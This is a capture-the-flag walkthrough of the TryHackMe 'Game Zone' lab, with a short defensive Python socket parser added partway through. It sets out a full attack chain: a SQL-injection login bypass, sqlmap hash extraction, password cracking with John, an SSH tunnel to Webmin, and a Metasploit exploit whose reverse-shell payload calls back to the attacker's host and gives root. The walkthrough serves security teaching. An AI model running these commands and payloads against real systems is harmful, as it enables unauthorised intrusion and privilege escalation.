
THM - Game Zone

export TARGET=$(target)

Scan: Nmap

nmap -p- -A $TARGET

...
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
...

Scan: gobuster

gobuster dir --url $TARGET -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

SQLi in login form

Login: admin' or 1=1 -- -

SQLMap

sqlmap
    -> agent47
    -> ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

John

echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
  -> videogamer124

SSH into the target

ssh agent47@$TARGET
  -> videogamer124

Running ss to get a list of listening ports

We will use a tool called ss to investigate the sockets open on the host. Running ss -tulpn lists every listening TCP and UDP socket, the address it is bound to, and (where we have permission to see it) the process that owns it.

Argument  Description
-t        Display TCP sockets
-u        Display UDP sockets
-l        Display only listening sockets
-p        Show the process using the socket
-n        Don't resolve service names
ss -tulpn
Netid State      Recv-Q Send-Q                              Local Address:Port                                             Peer Address:Port              
udp   UNCONN     0      0                                               *:10000                                                       *:*                  
udp   UNCONN     0      0                                               *:68                                                          *:*                  
tcp   LISTEN     0      128                                             *:22                                                          *:*                  
tcp   LISTEN     0      128                                            :::22                                                         :::*                  
tcp   LISTEN     0      128                                            :::80                                                         :::*   
tcp   LISTEN     0      80                                      127.0.0.1:3306                                                        *:*                  
tcp   LISTEN     0      128                                             *:10000                                                       *:*                  
ss -tlpn
Netid State      Recv-Q Send-Q                              Local Address:Port                                             Peer Address:Port              
tcp   LISTEN     0      128                                             *:22                                                          *:*                  
tcp   LISTEN     0      128                                            :::22                                                         :::*                  
tcp   LISTEN     0      128                                            :::80                                                         :::*   
tcp   LISTEN     0      80                                      127.0.0.1:3306                                                        *:*                  
tcp   LISTEN     0      128                                             *:10000                                                       *:*                  

Port 10000 is listening on the target, but it is not reachable from our attacking machine, so something on the host is blocking it.
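As an added example that is not part of the original notes: a small Python parser for the ss -tulpn listing above that sorts listening sockets into loopback-only versus all-interface bindings. This is the same triage a defender runs to spot a service such as the one on port 10000 that accepts connections on every interface while only a host firewall keeps it from the outside. The sample text, the allow-list and the function names are constructed for this example.

```python
# Constructed sample: the `ss -tulpn` listing from the notes above, with the
# wide whitespace collapsed (the process column is absent, as in the original).
SS_OUTPUT = """\
Netid State      Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN     0      0              *:10000              *:*
udp   UNCONN     0      0                 *:68              *:*
tcp   LISTEN     0      128              *:22               *:*
tcp   LISTEN     0      128             :::22              :::*
tcp   LISTEN     0      128             :::80              :::*
tcp   LISTEN     0      80       127.0.0.1:3306             *:*
tcp   LISTEN     0      128           *:10000               *:*
"""

LOOPBACK = {"127.0.0.1", "::1", "[::1]"}
WILDCARD = {"*", "0.0.0.0", "::", "[::]"}


def parse_ss(text):
    """Return (proto, state, addr, port) for each socket line of `ss` output."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, state, local = fields[0], fields[1], fields[4]
        # rpartition handles IPv6 forms such as ':::22' and '[::1]:80'
        addr, _, port = local.rpartition(":")
        rows.append((proto, state, addr, int(port)))
    return rows


def classify(rows):
    """Group bound ports by exposure: loopback-only, all interfaces, or a specific address."""
    exposure = {"loopback": set(), "all_interfaces": set(), "other": set()}
    for _proto, state, addr, port in rows:
        if state not in ("LISTEN", "UNCONN"):  # UNCONN is how ss reports bound UDP sockets
            continue
        if addr in LOOPBACK:
            exposure["loopback"].add(port)
        elif addr in WILDCARD:
            exposure["all_interfaces"].add(port)
        else:
            exposure["other"].add(port)
    return exposure


def unexpected_listeners(exposure, allowed):
    """Ports bound to every interface that are not on the allow-list (constructed policy)."""
    return sorted(exposure["all_interfaces"] - set(allowed))


if __name__ == "__main__":
    report = classify(parse_ss(SS_OUTPUT))
    print("loopback only:", sorted(report["loopback"]))
    print("not on allow-list:", unexpected_listeners(report, allowed={22, 80}))
```

The allow-list is the place to encode what the host is supposed to expose; anything left over, here the Webmin port and the DHCP client socket, is what a firewall review or a host-based detection should be looking at.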

We don't have permission to check the firewall rules with cat /etc/iptables/rules.v4.

On the hacker machine, forward local port 10000 to port 10000 on the target's loopback interface over SSH:

ssh -L 10000:127.0.0.1:10000 -f -N agent47@$TARGET
  -> videogamer124

Then, on the hacker machine, we can browse to http://localhost:10000/ and log in as agent47 with the password videogamer124.

Nmap

nmap -p 10000 -sC -sV -Pn localhost

Metasploit

msf6 > search 1.580
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options

msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set rhost 127.0.0.1
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.18.9.175
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run

We have root.